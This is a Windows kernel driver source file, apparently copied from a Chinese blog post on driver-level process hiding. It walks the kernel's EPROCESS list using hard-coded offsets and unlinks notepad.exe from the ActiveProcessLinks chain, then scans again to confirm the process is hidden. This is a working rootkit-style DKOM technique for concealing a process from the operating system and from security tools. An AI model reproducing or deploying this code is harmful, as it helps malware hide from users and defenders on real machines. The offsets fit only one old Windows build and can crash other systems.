#ifndef CXX_DIRVERPROHIDE_H
#include "dirverprohide.h"
#endif
VOID
DriverUnload(__in struct _DRIVER_OBJECT *DriverObject)
{
KdPrint(("驱动卸载成功!"));
KdPrint(("PID = %d", PsGetCurrentProcessId()));
}
NTSTATUS
DriverEntry(IN PDRIVER_OBJECT pDriverObj, IN PUNICODE_STRING pRegistryString)
{
KdPrint(("驱动加载成功!"));
KdPrint(("驱动是由 PID = %d 运行着!", PsGetCurrentProcessId()));
// 通过EPROCESS枚举进程
ULONG uNextEProcess = 0;
ULONG uCurEProcess = 0;
ULONG unote1 = 0;
ULONG unote2 = 0;
ULONG ubefore1 = 0;
ULONG ubefore2 = 0;
ULONG ulater1 = 0;
ULONG ulater2 = 0;
uCurEProcess = uNextEProcess = (ULONG)PsGetCurrentProcess() + 0x88;
do
{
KdPrint(("进程名:%s\t\tPID:%d\r\n",
uNextEProcess-0x88+0x174,
*(PULONG)(uNextEProcess-0x88+0x84)));
if(strstr((PCHAR)(uNextEProcess-0x88+0x174),
"notepad.exe"))
{
unote1= *(PULONG)(uNextEProcess);
unote2= *(PULONG)(uNextEProcess+4);
ubefore1=*(PULONG)unote1 ;
ubefore2=*(PULONG)(unote1+4);
ulater1=*(PULONG)unote2;
ulater2=*(PULONG)(unote2+4);
// ubefore2=unote2;
// ulater1=unote1;
memcpy((void *)(unote1+4),(void *)&unote2,4);
memcpy((void *)unote2,(void *)&unote1,4);
//notepad 地址 *(PULONG)uNextEProcess) *(PULONG)uNextEProcess+4)
KdPrint(("ubefore1:%p ubefore2:%p\r\n",ubefore1,ubefore2));
KdPrint(("unote1:%p unote2:%p\r\n",unote1,unote2));
KdPrint(("ulater1:%p ulater2:%p\r\n",ulater1,ulater2));
KdPrint(("发现记事本!"));
}
uNextEProcess = *(PULONG)(uNextEProcess);
}
while(uCurEProcess != uNextEProcess);
do
{
KdPrint(("再次扫描进程名:%s\t\tPID:%d\r\n",
uNextEProcess-0x88+0x174,
*(PULONG)(uNextEProcess-0x88+0x84)));
if(strstr((PCHAR)(uNextEProcess-0x88+0x174),
"notepad.exe"))
{
KdPrint(("发现记事本,隐藏失败!"));
}
uNextEProcess = *(PULONG)(uNextEProcess);
}
while(uCurEProcess != uNextEProcess);
pDriverObj->DriverUnload = DriverUnload;
return 0;
}
驱动级别 进程隐藏pid
猜你喜欢
转载自blog.csdn.net/h1028962069/article/details/52103336
今日推荐
周排行